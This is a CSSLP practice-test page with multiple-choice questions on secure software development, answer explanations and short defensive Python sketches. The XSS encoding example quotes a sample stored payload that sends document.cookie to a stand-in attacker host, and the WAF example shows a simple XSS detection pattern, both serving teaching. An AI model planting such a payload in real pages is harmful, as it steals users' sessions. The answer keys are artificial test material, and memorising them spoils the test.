ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Practice Test
Use the form below to configure your ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Practice Test. The practice test can be configured to include only certain exam objectives and domains. You can choose between 5 and 100 questions and set a time limit.

ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Information
What is the CSSLP Certification?
The Certified Secure Software Lifecycle Professional (CSSLP) from ISC2 validates that a software professional can integrate security best practices into every phase of the development life cycle. While many security credentials focus on infrastructure or operations, CSSLP zeroes in on building security in from the first requirements workshop through retirement of an application. Holding the certification signals to employers and customers that you can help reduce vulnerabilities, meet compliance mandates, and ultimately ship more resilient software.
How the Exam Is Structured
The current CSSLP exam is a computer-based test containing 125 multiple-choice questions delivered over a three-hour session. A scaled score of 700 out of 1,000 is required to pass. Content is distributed across eight domains that mirror the secure software development life cycle: 1) Secure Software Concepts, 2) Secure Software Requirements, 3) Secure Software Architecture and Design, 4) Secure Software Implementation, 5) Secure Software Testing, 6) Secure Software Lifecycle Management, 7) Secure Software Deployment, Operations, Maintenance, and 8) Secure Software Supply Chain. Because any topic in these domains is fair game, candidates need both breadth and depth of knowledge across process models, threat modeling, secure coding, DevSecOps pipelines, and supply-chain risk management.
The Power of Practice Exams
One of the most effective ways to close a knowledge gap and build exam-day confidence is to take high-quality practice exams. Timed drills acclimate you to the three-hour pacing and help you learn how long you can spend on each question before moving on. Equally important, comprehensive explanations (not just answer keys) reveal why a particular choice is correct, which deepens conceptual understanding and highlights recurring exam patterns. Aim to review every explanation—even the questions you answer correctly—to reinforce core principles and discover alternate ways a concept can be tested. Track scores over multiple attempts; trending upward is a reliable indicator that your study plan is working.
Preparation Tips
Begin your study schedule at least eight to twelve weeks out, mapping the official ISC2 exam outline to specific learning resources such as the (ISC)² CSSLP CBK, OWASP documentation, and language-specific secure-coding references. After you’ve covered each domain, fold in practice exams and use their analytics to guide targeted review sessions. In the final two weeks, simulate the exam environment: mute notifications, sit for a full three-hour block, and practice reading every question twice before locking in an answer. Coupled with real-world experience and a disciplined study routine, these strategies position you to walk into the testing center—and out with the CSSLP credential—on your first attempt.

Free ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Practice Test
- 20 Questions
- Unlimited time
- Secure Software Concepts
- Secure Software Lifecycle Management
- Secure Software Requirements
- Secure Software Architecture and Design
- Secure Software Implementation
- Secure Software Testing
- Secure Software Deployment, Operations, Maintenance
- Secure Software Supply Chain
During an Agile project retrospective, the secure software lead is asked to redesign the organization's security-awareness program so that it meets role-based training expectations. Which approach most effectively fulfills the requirement to provide role-appropriate security training for developers, testers, and project managers?
Email the organization's secure coding standard to all staff and ask them to acknowledge that they have read it.
Require every team member to earn the same external penetration-testing certification regardless of their job function.
Create separate curricula that link security learning objectives to each role's tasks; for example, secure coding labs for developers, vulnerability test-case workshops for testers, and risk-based planning sessions for project managers.
Hold one annual, company-wide presentation on general security topics such as password hygiene and phishing, with no differentiation among roles.
Answer Description
Role-based security training must be directly relevant to what each job function does. The option that maps distinct learning objectives and hands-on activities to the daily responsibilities of developers (secure coding practices), testers (security test design and tool use), and project managers (risk-based planning and compliance oversight) delivers focused, actionable knowledge. A single generic awareness briefing, a one-size-fits-all penetration-testing course, or simply emailing standards without practice fails to address the specific skills and duties of each role, so they do not satisfy the exam's requirement for role-based security training.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI-generated content may display inaccurate information; always double-check anything important.
What is role-based security training?
Why is a single general security-awareness presentation insufficient?
How do secure coding labs help developers improve security?
During contract negotiations for a cloud-hosted authentication service, your organization insists that the provider stream security logs to your SIEM and apply critical security patches within an agreed period. Which contractual instrument is BEST suited to formalize and enforce these ongoing monitoring and vulnerability-response requirements?
A non-disclosure agreement outlining confidentiality and proprietary information handling
An intellectual-property assignment transferring ownership of custom-developed code
A code-escrow clause ensuring release of source code if the supplier becomes insolvent
A service-level agreement that specifies log delivery formats, frequency, and remediation timelines
Answer Description
A service-level agreement (SLA) is specifically intended to define measurable performance and service requirements that the supplier must meet throughout the life of the contract. Security-related SLAs commonly spell out log-generation formats, transmission frequency to the customer's SIEM, maximum time to notify of incidents, and deadlines for releasing patches or mitigations. A non-disclosure agreement focuses on confidentiality, not operational security obligations. A code-escrow clause only guarantees source-code availability if the vendor fails to support the product, and an intellectual-property assignment governs ownership rights, not day-to-day security monitoring or response expectations. Therefore, the SLA is the most appropriate vehicle for enforcing continuous logging and vulnerability-response commitments.
Ask Bash
What is a Service-Level Agreement (SLA)?
Why is an SLA better suited than an NDA for security-related commitments?
What is a Security Information and Event Management (SIEM) system?
During security testing of a payment microservice in a staging cluster, you must confirm that the service fails safely if its hardware security module (HSM) suddenly becomes unreachable. Which testing action represents a targeted fault-injection test aimed at exercising this specific failure mode?
Launch a high-volume set of random, malformed TLS handshake messages at the microservice to see how it handles unexpected input.
Perform a static code review to look for unhandled exceptions around every HSM API invocation.
Intercept the microservice's calls to the HSM and programmatically force each request to time out before a response is returned.
Shut down the microservice's network interface card to observe how it behaves when all outbound traffic is blocked.
Answer Description
Fault injection deliberately introduces faults at the point where they would naturally occur so the team can observe error-handling behavior. Intercepting HSM API calls inside the microservice and forcing them to time out directly emulates the condition of an unresponsive HSM, allowing testers to verify graceful degradation and proper exception handling. Generating random TLS handshakes is fuzz testing that focuses on protocol parsing, not device failure. Reviewing source code is static analysis and does not actively introduce a fault. Disabling the microservice's entire network interface disrupts many functions and is closer to a broad resilience or chaos test, not a targeted injection at the HSM dependency.
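To make the correct option concrete, here is a minimal Python sketch of this style of fault injection. The `HsmClient` and `PaymentService` classes are invented for illustration; the test intercepts the HSM call with a mock and forces a timeout, then checks that the service fails safely instead of proceeding unsigned.

```python
import unittest.mock

class HsmClient:
    """Hypothetical HSM client; real code would call the HSM over the network."""
    def sign(self, payload):
        return b"signature"

class PaymentService:
    def __init__(self, hsm):
        self.hsm = hsm

    def authorize(self, payload):
        try:
            self.hsm.sign(payload)
            return "approved"
        except TimeoutError:
            # Fail safely: decline rather than proceed without a signature.
            return "declined-hsm-unavailable"

# Fault injection: force every HSM call to time out before a response arrives.
service = PaymentService(HsmClient())
with unittest.mock.patch.object(HsmClient, "sign", side_effect=TimeoutError):
    result = service.authorize(b"txn-123")

print(result)  # declined-hsm-unavailable
```

Because the fault is injected exactly at the HSM dependency, the rest of the service keeps running, which is what distinguishes this from broad resilience tests such as disabling the network interface.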
Ask Bash
What is an HSM and why is it important in security testing?
How does fault injection differ from chaos testing?
What is fuzz testing, and why is it not the right choice in this case?
During a quarterly review, a development manager asks for a single metric that shows how quickly the team fixes vulnerabilities identified by automated security scans in the CI/CD pipeline. Which metric will most directly satisfy this request and enable tracking of improvement over time?
Vulnerability density per thousand lines of code
Number of security champions assigned per scrum team
Percentage of code covered by unit tests
Mean Time to Remediate (MTTR) vulnerabilities
Answer Description
Mean Time to Remediate (sometimes called Average Remediation Time) measures the elapsed time between the discovery of a vulnerability and its successful fix in production or in the code repository. A shorter MTTR demonstrates that the team is responding to findings promptly, which is exactly what the manager wants to monitor. Vulnerability density focuses on the quantity of issues per code size, not the speed of resolution. Code-coverage percentages indicate testing breadth but reveal nothing about remediation speed. Counting security champions is a staffing measure, not a performance or timing metric.
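As a quick sketch of how this metric is computed (the finding data below is illustrative), MTTR is simply the average of each vulnerability's discovery-to-fix interval:

```python
from datetime import datetime, timedelta

def mean_time_to_remediate(findings):
    """Average elapsed time between discovery and fix across all findings."""
    deltas = [fixed - found for found, fixed in findings]
    return sum(deltas, timedelta()) / len(deltas)

# Illustrative scan findings: (discovered, remediated) timestamp pairs.
findings = [
    (datetime(2024, 1, 1), datetime(2024, 1, 4)),  # fixed in 3 days
    (datetime(2024, 1, 2), datetime(2024, 1, 9)),  # fixed in 7 days
]
print(mean_time_to_remediate(findings))  # 5 days, 0:00:00
```

Recomputing this per sprint or per quarter gives the trend line the manager asked for: a falling MTTR means vulnerabilities are being closed faster.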
Ask Bash
What is Mean Time to Remediate (MTTR)?
Why is MTTR preferred over vulnerability density for tracking remediation speed?
How can automated security scans in CI/CD pipelines help improve MTTR?
During planning for a new application that will be developed using a sequential Waterfall model, the security lead decides to add one security activity to each phase. Which activity is correctly matched to its Waterfall phase?
Conducting penetration testing during the design phase
Running static application security testing (SAST) during the implementation/coding phase
Defining security requirements during the coding/implementation phase
Performing threat modeling during the verification/testing phase
Answer Description
Static application security testing (SAST) examines source or binary code for defects and should be integrated while the code is being written, making the implementation/coding phase the appropriate point in a Waterfall project. Security requirements belong in the requirements phase, threat modeling is most effective during design, and penetration testing is normally scheduled for the testing/verification phase after the system is built.
Ask Bash
What is Static Application Security Testing (SAST)?
Why is the coding/implementation phase suitable for SAST?
What are some tools used for SAST?
While designing firmware updates for smart door locks in a corporate campus, you must ensure the locks are fail-safe. If the update process crashes midway, which behavior best embodies the fail-safe principle?
The lock disables all authentication checks and accepts any remote open command for troubleshooting.
The lock automatically unlocks so occupants and technicians can enter and fix the issue.
The lock stays locked and can be opened only with a physical master key until the firmware is successfully restored.
The lock reboots every minute and retries the update, temporarily disabling normal lock functions.
Answer Description
The fail-safe (or fail-secure) principle requires that when a component fails it defaults to the most secure state, preventing unauthorized access even if usability is reduced. Keeping the lock engaged and forcing users to rely on a physical override key maintains security despite the software failure. Automatically unlocking, disabling authentication checks, or repeatedly rebooting may expose the facility to unauthorized entry or create a denial-of-service condition, so they do not satisfy the fail-safe requirement.
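As a toy illustration of the principle (the `SmartLock` class and its states are invented for this sketch), the lock below defaults to its most secure state whenever the update path fails:

```python
class SmartLock:
    """Toy model of a fail-safe lock: any update failure leaves it locked."""

    def __init__(self):
        self.locked = True

    def apply_firmware_update(self, update):
        try:
            update()  # firmware flashing step; may crash mid-way
            return "updated"
        except Exception:
            # Fail safe: default to the most secure state (locked).
            # Entry now requires the physical master key, handled out-of-band.
            self.locked = True
            return "update-failed-lock-engaged"

def crashing_update():
    raise RuntimeError("power loss during flash")

lock = SmartLock()
status = lock.apply_firmware_update(crashing_update)
print(status, lock.locked)  # update-failed-lock-engaged True
```

Usability suffers (someone must fetch the master key), but the failure never widens the attack surface, which is the trade-off the principle accepts.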
Ask Bash
What does fail-safe mean in secure software design?
Why is a physical master key necessary for fail-safe designs in smart locks?
How does a fail-safe system differ from fail-open designs in security?
During an architecture review of a ride-sharing mobile app, you notice the client uploads raw GPS coordinates every five seconds, even when running in the background, to pre-match available rides. Which architectural change most effectively mitigates privacy risks associated with this implicit data collection while still allowing the feature to function?
Perform on-device processing of GPS data and send only coarse, tokenized area identifiers needed for ride matching.
Increase retention of uploaded location records to 90 days to support analytics and fraud investigations.
Route location uploads through a separate, dedicated API gateway isolated from other services.
Protect the GPS payload with TLS 1.3 encryption during transmission to the backend.
Answer Description
Processing the user's precise location locally on the device and transmitting only the minimum necessary information (for example, a coarse-grained or tokenized area identifier) applies the principle of data minimization. By limiting the granularity of the data that leaves the device, the architecture reduces the amount of personally identifiable location information exposed or stored, directly lowering privacy risk while preserving the matching feature. Simply encrypting transmissions protects data in transit but does not reduce what is collected; extending retention increases risk; and using a separate API gateway changes network topology without addressing the privacy issue of collecting fine-grained location data.
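A minimal sketch of this on-device minimization step (the grid size, token scheme, and `coarse_area_token` helper are assumptions for illustration): precise coordinates are snapped to a coarse grid cell on the device, and only a keyed token for the cell leaves the phone.

```python
import hashlib

def coarse_area_token(lat, lon, secret, cell_deg=0.01):
    """Round coordinates to a roughly 1 km grid cell, then tokenize the
    cell ID so the backend never receives raw GPS coordinates."""
    cell_id = f"{round(lat / cell_deg) * cell_deg:.2f},{round(lon / cell_deg) * cell_deg:.2f}"
    return hashlib.sha256((secret + cell_id).encode()).hexdigest()[:16]

# Two nearby riders map to the same area token; exact positions stay on-device.
a = coarse_area_token(40.74152, -73.98941, secret="demo-key")
b = coarse_area_token(40.74109, -73.98987, secret="demo-key")
print(a == b)  # True
```

The backend can still pre-match rides by comparing tokens, but the fine-grained trail of coordinates is never collected, which is the essence of data minimization.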
Ask Bash
What is data minimization in relation to user privacy?
How does on-device processing improve privacy?
What is the difference between TLS encryption and data minimization?
During vendor due diligence for incorporating open-source libraries, you must reference an internationally recognized standard that defines requirements for an open-source license compliance program within the software supply chain. Which ISO/IEC standard should you cite?
ISO/IEC 5230 OpenChain Specification
ISO/IEC 27034 Application Security
ISO/IEC 27036-4 ICT Supply Chain Security
ISO/IEC 12207 Software Life-Cycle Processes
Answer Description
ISO/IEC 5230, also known as the OpenChain Specification, is the only ISO/IEC standard that sets out the processes an organization should follow to establish and maintain an open-source license compliance program. ISO/IEC 27034 focuses on secure application development practices, ISO/IEC 12207 covers general software life-cycle processes, and ISO/IEC 27036-4 addresses broader ICT supply-chain security, none of which prescribe detailed OSS license compliance measures. Therefore, referring to ISO/IEC 5230 is the correct choice when assessing open-source license compliance within the software supply chain.
Ask Bash
What is ISO/IEC 5230 OpenChain Specification?
Why is open-source license compliance important in the software supply chain?
How does ISO/IEC 5230 compare to other ISO/IEC standards in software security?
A development team is building an online banking API that must decide at run-time whether a user may transfer money between two accounts. The decision depends on current balances, daily limits, account ownership, and in-memory fraud flags. Which implementation best illustrates an imperative (programmatic) security approach for this need?
Set container securityContext fields to restrict network egress to the banking core and rely on the platform to block unauthorized calls.
Attach a pre-defined cloud IAM role to the container so only principals with that role can invoke any API endpoint.
Define allowed source and destination account pairs in a YAML policy file that the API gateway enforces at deployment time.
Write a validation routine inside the transferFunds() method that checks the requester's role, account ownership, real-time balances, and fraud flags before executing the transaction.
Answer Description
Imperative security embeds access-control logic directly in executable code so it can evaluate dynamic, context-specific information at run-time. Placing a transfer-authorization function inside the service method lets the application inspect live variables such as balances, limits, and fraud flags before permitting the operation. The other choices rely on external, largely static configurations (YAML policies, container manifests, or pre-defined cloud IAM roles) that describe permissions declaratively; they cannot easily incorporate the complex, per-request business logic required here.
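The correct option can be sketched in a few lines of Python (the `Account` and `User` types and the specific checks are illustrative, not a reference implementation): the authorization decision is ordinary code that reads live state on every call.

```python
from dataclasses import dataclass

@dataclass
class Account:
    id: str
    owner_id: str
    balance: float
    daily_limit: float = 1000.0
    daily_transferred: float = 0.0

@dataclass
class User:
    id: str

def transfer_funds(requester, source, dest, amount, fraud_flags):
    """Imperative security: the access decision is executable logic that
    evaluates per-request context (balances, limits, fraud flags) at run-time."""
    if requester.id != source.owner_id:
        raise PermissionError("requester does not own the source account")
    if source.balance < amount:
        raise PermissionError("insufficient balance")
    if source.daily_transferred + amount > source.daily_limit:
        raise PermissionError("daily transfer limit exceeded")
    if source.id in fraud_flags or dest.id in fraud_flags:
        raise PermissionError("account flagged for fraud review")
    source.balance -= amount
    dest.balance += amount
    source.daily_transferred += amount

alice = User("alice")
src = Account("acct-1", owner_id="alice", balance=500.0)
dst = Account("acct-2", owner_id="bob", balance=100.0)
transfer_funds(alice, src, dst, 200.0, fraud_flags=set())
print(src.balance, dst.balance)  # 300.0 300.0
```

A declarative YAML policy or IAM role could express "alice may call this endpoint," but not "only if her balance covers the amount and no fraud flag is set right now"; that per-request logic is what pushes the decision into code.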
Ask Bash
What is imperative security in programming?
Why is declarative security insufficient for dynamic checks?
How does the `transferFunds()` method ensure real-time security?
Your DevOps team is retiring a cloud-hosted microservice that stored protected health information (PHI) on provider-managed, hardware-encrypted SSD volumes. Because you cannot physically access or degauss the drives, you must satisfy NIST SP 800-88 purge requirements to ensure the data is permanently unrecoverable. Which destruction technique is most appropriate in this situation?
Degauss the underlying storage media to eliminate residual magnetism.
Delete the application files and empty the operating system's recycle bin.
Issue a cryptographic erase that destroys the drive's encryption keys, rendering all stored data unreadable.
Overwrite the entire volume once with zeros using a disk utility such as dd.
Answer Description
Cryptographic erasure meets the NIST SP 800-88 definition of a purge method by rendering data unrecoverable through destruction of the encryption keys protecting the media. Because the SSDs are managed by the cloud provider, you cannot rely on physical destruction or degaussing, and degaussing is ineffective on solid-state media anyway. Logical file deletion does not remove the data, and a single-pass overwrite may be insufficient or infeasible on SSDs whose controllers remap blocks. Therefore, issuing a cryptographic erase command that invalidates the drive's encryption keys is the most appropriate and reliable method for secure data destruction in this scenario.
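The mechanism can be shown with a toy Python sketch. The SHA-256 counter-mode keystream below stands in for the drive's real AES engine and is for illustration only, never for production use; the point is that once the key is destroyed, the ciphertext still resting on the media is computationally unrecoverable.

```python
import hashlib
import itertools
import secrets

def keystream(key, n):
    """Toy counter-mode keystream from SHA-256 (illustrative only; a real
    self-encrypting drive uses AES in hardware)."""
    out = b""
    for ctr in itertools.count():
        if len(out) >= n:
            return out[:n]
        out += hashlib.sha256(key + ctr.to_bytes(8, "big")).digest()

def xor(data, ks):
    return bytes(a ^ b for a, b in zip(data, ks))

plaintext = b"patient: Jane Doe, MRN 12345"
key = secrets.token_bytes(32)
stored = xor(plaintext, keystream(key, len(plaintext)))  # what rests on the SSD

# While the key exists, the data is readable:
assert xor(stored, keystream(key, len(stored))) == plaintext

# Cryptographic erase: destroy the key. The ciphertext blocks were never
# overwritten, yet the PHI can no longer be recovered from them.
key = None
```

This is why cryptographic erase works even on provider-managed media: the purge happens by invalidating the key, not by touching the physical blocks.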
Ask Bash
What is cryptographic erasure?
Why is degaussing ineffective on SSDs?
What are NIST SP 800-88 data purge requirements?
While hardening its CI/CD pipeline, a DevSecOps team decides to add a runtime control that can detect and block cross-site scripting attempts as they arrive from external clients. Which mechanism directly fulfills this requirement?
Sign each container image and verify the signature prior to deployment.
Deploy a cloud-based Web Application Firewall in front of the application to filter HTTP requests in real time.
Perform software composition analysis to identify vulnerable third-party libraries before packaging.
Run static application security testing on the codebase during the build phase.
Answer Description
A web application firewall (WAF) operates in real time between users and the application, inspecting each HTTP request and response. Because it can recognize malicious payloads such as cross-site scripting or SQL injection and block or sanitize them before they reach application code, it provides the desired runtime protection.
Static application security testing (SAST) analyzes source code or binaries during the build phase, not at runtime. Software composition analysis (SCA) inventories third-party components for known vulnerabilities but does not intercept live traffic. Container image signing verifies integrity before deployment; it has no visibility into or control over active HTTP sessions. Therefore, deploying a WAF is the only option that meets the requirement.
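As a highly simplified sketch of what a WAF rule does at runtime (real WAFs such as those built on the ModSecurity Core Rule Set use far richer normalization and rule sets than this single regex), each incoming request parameter is inspected before it reaches the application:

```python
import re

# Illustrative signature for common XSS payload fragments.
XSS_PATTERN = re.compile(r"<\s*script|javascript\s*:|on\w+\s*=", re.IGNORECASE)

def inspect_request(params):
    """Return 'blocked' if any request parameter looks like an XSS payload."""
    for value in params.values():
        if XSS_PATTERN.search(value):
            return "blocked"
    return "allowed"

print(inspect_request({"q": "running shoes"}))                            # allowed
print(inspect_request({"q": "<script>alert(document.cookie)</script>"}))  # blocked
```

The key property is timing: the inspection happens on live traffic, which SAST, SCA, and image signing cannot do.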
Ask Bash
What is a Web Application Firewall (WAF)?
How does a WAF detect and block cross-site scripting (XSS)?
Why can't static application security testing (SAST) replace a WAF for runtime protection?
Your organization runs a containerized web application on a managed Kubernetes cluster. To strengthen continuous monitoring, you must configure security telemetry sent to the SIEM so that attempted runtime privilege-escalation inside any container is detected as soon as it happens. Which data source should you prioritize forwarding?
Application access logs produced by the web servers in each container
Virtual network flow logs captured from the cluster's network interfaces
Kernel-level system call events collected by a container runtime or eBPF sensor
Scheduled configuration snapshots exported from the Kubernetes API server
Answer Description
Privilege escalation inside a running container is best identified by monitoring the low-level operating-system events that occur when a process tries to change its user or group privileges (for example, setuid or setgid system calls). Kernel-level system call telemetry gathered by a container runtime or eBPF-based sensor (such as Falco) surfaces these events in near real time, allowing the SIEM to alert immediately. Web-server access logs focus on HTTP requests and rarely expose internal privilege changes. Network flow logs show traffic patterns but not internal process activities. Periodic Kubernetes API snapshots capture configuration changes, not moment-to-moment actions occurring inside containers. Therefore, kernel-level system call events provide the most timely and reliable indication of container privilege escalation.
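To illustrate what the SIEM would do with this telemetry, here is a minimal Python sketch of a detection rule over syscall events. The event schema is invented for the example; a real sensor such as Falco emits richer records, but the filtering idea is the same.

```python
# Hypothetical kernel-level events from an eBPF/runtime sensor.
events = [
    {"container": "web-1", "syscall": "openat", "uid": 1000},
    {"container": "web-1", "syscall": "setuid", "uid": 1000, "target_uid": 0},
    {"container": "api-2", "syscall": "read",   "uid": 1000},
]

def privilege_escalation_alerts(stream):
    """Flag attempts to switch to root (uid 0) via setuid/setgid calls."""
    return [
        e for e in stream
        if e["syscall"] in ("setuid", "setgid") and e.get("target_uid") == 0
    ]

for alert in privilege_escalation_alerts(events):
    print(f"ALERT: {alert['container']} attempted escalation to uid 0")
```

Note that neither HTTP access logs nor network flow records would contain the `setuid` event at all, which is why the syscall feed is the source to prioritize.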
Ask Bash
What is eBPF and how does it help with monitoring in containers?
Why aren't application access logs sufficient for detecting privilege escalation?
What is a SIEM, and how does it use kernel-level system call telemetry?
During a security assessment of an internally developed RESTful microservice, you suspect there are API endpoints not included in the official design documentation. What test activity would be most effective for uncovering this undocumented functionality before production release?
Conduct black-box fuzzing that mutates URL paths and HTTP verbs to enumerate undisclosed endpoints
Execute unit tests derived from user story acceptance criteria
Run stress testing with production-like load to measure service scalability
Perform static analysis of source code to identify insecure cryptographic implementations
Answer Description
Undocumented functionality is best revealed by treating the system as an unknown environment and actively probing for behavior that is not described in specifications. Black-box fuzzing that mutates resource paths, query strings, headers, and HTTP verbs forces the service to respond to unexpected requests and helps enumerate hidden or forgotten endpoints. Other options fall short: static code analysis can expose coding errors but may miss runtime-only routes; stress testing focuses on performance, not functionality discovery; unit tests based on documented user stories are constrained to what is already known, so they cannot expose undocumented interfaces.
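The enumeration idea can be sketched in a few lines of Python. Here a hypothetical route table stands in for the live service (a real test would send HTTP requests to the staging environment); the fuzzer iterates verb/path combinations and flags any responsive endpoint missing from the documentation.

```python
from itertools import product

# Stand-in for the running service: documented routes plus one hidden endpoint.
DOCUMENTED = {("GET", "/orders"), ("POST", "/orders")}
ACTUAL = DOCUMENTED | {("DELETE", "/admin/orders")}  # undocumented route

def probe(method, path):
    """Simulate the service's response status for a request."""
    return 200 if (method, path) in ACTUAL else 404

verbs = ["GET", "POST", "PUT", "DELETE"]
paths = ["/orders", "/admin/orders", "/users", "/debug"]

discovered = {
    (m, p) for m, p in product(verbs, paths)
    if probe(m, p) == 200 and (m, p) not in DOCUMENTED
}
print(discovered)  # {('DELETE', '/admin/orders')}
```

Real fuzzers also mutate query strings, headers, and wordlist-derived paths, but even this skeleton shows why probing beats specification-driven tests for finding forgotten endpoints.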
Ask Bash
What is black-box fuzzing?
How can mutated URL paths and HTTP verbs help uncover hidden API endpoints?
Why is black-box fuzzing preferred over static analysis for discovering undocumented endpoints?
While planning security for a new tele-medicine platform, the lead architect requests a threat-modeling approach that is explicitly risk-centric, walks through seven ordered stages from defining business objectives to selecting countermeasures, and incorporates attack simulation to quantify likelihood. Which methodology best fits these criteria?
Process for Attack Simulation and Threat Analysis (PASTA)
Common Vulnerability Scoring System (CVSS)
STRIDE
Security Content Automation Protocol (SCAP)
Answer Description
The Process for Attack Simulation and Threat Analysis (PASTA) is a seven-stage, risk-centric threat-modeling methodology. It begins by identifying business objectives and technical scope, then models and simulates plausible attacks to estimate risk, and finally maps security controls to the most significant threats. STRIDE is category-based and asset-centric, CVSS scores known vulnerabilities rather than modeling threats, and Security Content Automation Protocol (SCAP) is a standards framework for automating vulnerability management, not a threat-modeling process.
Ask Bash
What are the seven stages of the PASTA methodology?
How does PASTA differ from STRIDE in terms of focus?
What makes attack simulation an essential step in PASTA?
A developer is updating an e-commerce site to display customer-supplied product reviews in an HTML template. The reviews are saved in the database without modification. To stop attackers from injecting malicious scripts that execute in shoppers' browsers, which control should the developer add to the presentation layer?
Obfuscate the site's JavaScript files with a packer during the build process.
Require multi-factor authentication for users who submit reviews.
Reject any review whose length exceeds a predefined maximum.
Apply HTML entity encoding to the review text immediately before it is written to the page.
Answer Description
Cross-site scripting occurs when untrusted data is sent to a browser without proper output handling. The safest countermeasure is context-aware output encoding: before the review text is written into the HTML response, characters such as <, >, ", and & are converted to their corresponding HTML entities. This breaks any script tags an attacker might have stored, rendering them harmless. Merely limiting length, adding MFA, or obfuscating site JavaScript does not neutralize executable payloads in user-supplied content.
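Python's standard library shows the countermeasure directly: `html.escape` converts the dangerous characters to entities at the moment the review is written into the HTML body.

```python
import html

# Attacker-supplied review stored verbatim in the database.
review = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Encode at output time, in the HTML body context:
safe = html.escape(review, quote=True)
page = f"<p>{safe}</p>"
print(page)  # <p>&lt;script&gt;fetch(&quot;https://evil.example/?c=&quot; ...</p>
```

The browser now renders the review as inert text; because the encoding happens at the presentation layer, the database can continue to store the original content unmodified, exactly as the scenario describes.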
Ask Bash
What is HTML entity encoding?
What is Cross-Site Scripting (XSS)?
Why is context-aware output encoding important?
Your organization is deploying a new SIEM that will ingest security event data in near real-time from application servers located in branch offices connected over the public Internet. To prevent both eavesdropping on the log contents and the insertion of forged log messages while they are in transit, which log-transfer design should you recommend?
Send standard UDP syslog on port 514 across a dedicated management VLAN to limit exposure.
Use RFC 5425 syslog over TLS with mutual certificate authentication between every server and the SIEM.
Attach an HMAC to each log entry but forward them over unencrypted TCP to minimize overhead.
Batch log files hourly, compress them, and upload via FTP over an IP-whitelisted channel to the SIEM.
Answer Description
Using the TLS transport mapping for syslog defined in RFC 5425 establishes an encrypted channel that prevents packet sniffers from reading log contents (protecting confidentiality) and requires X.509 certificate-based mutual authentication between the log sender and receiver (providing strong source authentication and integrity). This combination directly mitigates the twin risks of eavesdropping and message injection. A plain UDP syslog feed on a separate VLAN offers no cryptographic protection. FTP, even over an IP-restricted path, transmits data unencrypted and relies on post-transfer integrity checks at best. Forwarding logs over unencrypted TCP, even with an HMAC attached, would still expose their contents to interception, and the shared secret cannot authenticate individual hosts as robustly as mutual TLS. Therefore, the RFC 5425 syslog-over-TLS approach is the most effective answer.
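A brief Python sketch of the receiver-side TLS settings this design implies; the certificate and key file names in the comments are placeholders for your own PKI material, and the socket plumbing is omitted.

```python
import ssl

# Collector-side context for syslog over TLS (RFC 5425 style).
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.minimum_version = ssl.TLSVersion.TLSv1_2
ctx.verify_mode = ssl.CERT_REQUIRED  # demand a client cert: mutual authentication

# Placeholder paths; load your real collector identity and trust anchor:
# ctx.load_cert_chain("collector.crt", "collector.key")
# ctx.load_verify_locations("branch-office-ca.pem")

print(ctx.verify_mode == ssl.CERT_REQUIRED)  # True
```

With `CERT_REQUIRED` set, any sender that cannot present a certificate chaining to the trusted CA is rejected at the handshake, which is what blocks forged log sources before a single message is accepted.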
Ask Bash
What is RFC 5425 in the context of syslog?
Why is mutual TLS important for secure log transfer?
How does an HMAC differ from mutual TLS in securing logs?
What is the main vulnerability of standard UDP syslog on port 514?
Your team must share user activity logs with a third-party analytics vendor. To reduce privacy risk while still allowing regulators to trace events back to individuals if necessary, the security architect proposes pseudonymizing the user IDs. Which requirement below best satisfies the definition of pseudonymization in this context?
Replace each user ID with a random unique token and store the mapping table in an encrypted repository accessible only to a small, authorized team.
Hash each user ID with a random salt and permanently delete the salt before sharing the data set.
Mask each user ID by showing only the last four characters to the analytics vendor.
Encrypt the entire log file with AES-256 and keep the encryption key in the same cloud account as the data.
Answer Description
Pseudonymization replaces direct identifiers with artificial identifiers while keeping the means to re-identify data subjects separate and protected. Storing the mapping table in an encrypted repository with very limited access preserves the ability to reverse the process when legally justified, yet prevents the analytics vendor from linking the data to real identities. Hashing and discarding the salt would make re-identification impossible, producing anonymized rather than pseudonymized data. Encrypting the whole file without segregating the key offers confidentiality but not pseudonymization, because decryption automatically restores the identifiers. Simply masking part of the identifier leaves recognizable information exposed and is not considered pseudonymization under privacy regulations.
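The core mechanic, random tokens in the shared data set plus a separately held mapping table, can be sketched in a few lines of Python. The in-memory dictionaries below stand in for what would, in practice, be an encrypted repository with tightly restricted access; the class and method names are illustrative, not from any particular library.

```python
import secrets

class Pseudonymizer:
    """Replaces direct identifiers with random tokens. The mapping
    tables are the sensitive artifact: in production they would live
    in an encrypted store accessible only to an authorized team,
    never shipped alongside the shared data set."""

    def __init__(self) -> None:
        self._forward: dict[str, str] = {}  # user_id -> token
        self._reverse: dict[str, str] = {}  # token -> user_id

    def tokenize(self, user_id: str) -> str:
        # Issue one stable random token per user so the vendor can
        # still correlate events, but cannot recover the identity.
        if user_id not in self._forward:
            token = secrets.token_hex(16)
            self._forward[user_id] = token
            self._reverse[token] = user_id
        return self._forward[user_id]

    def reidentify(self, token: str) -> str:
        # Only the holder of the mapping table (e.g. for a regulator
        # request) can reverse a token back to the original identity.
        return self._reverse[token]
```

Note the contrast with the hash-and-delete-salt option: here the reverse mapping is retained, so re-identification remains possible for those authorized to perform it, which is exactly what distinguishes pseudonymization from anonymization.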
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is pseudonymization in data privacy?
Why is hashing with a random salt not pseudonymization?
How does encrypting data differ from pseudonymization?
Your organization plans to adopt the OWASP Software Assurance Maturity Model (SAMM) to guide improvements to its secure software development process. According to SAMM's recommended rollout approach, which activity should the team perform first before setting any security objectives or defining an improvement roadmap?
Perform a baseline self-assessment to measure current maturity against SAMM security practices
Launch mandatory secure coding training for all development staff across the organization
Introduce a public bug-bounty program to discover previously unknown vulnerabilities
Deploy automated static application security testing (SAST) in every continuous integration pipeline
Answer Description
OWASP SAMM stresses that an organization must start by understanding where it currently stands. The model's initial step is a structured self-assessment that scores the maturity of each SAMM security practice. This baseline reveals strengths and gaps, allowing the team to set realistic targets and prioritize subsequent improvement activities. Deploying static analysis, launching secure coding training, or running a bug-bounty program are valuable tactics, but SAMM recommends pursuing such enhancements only after the initial assessment clarifies which practices need attention and at what maturity level.
Ask Bash
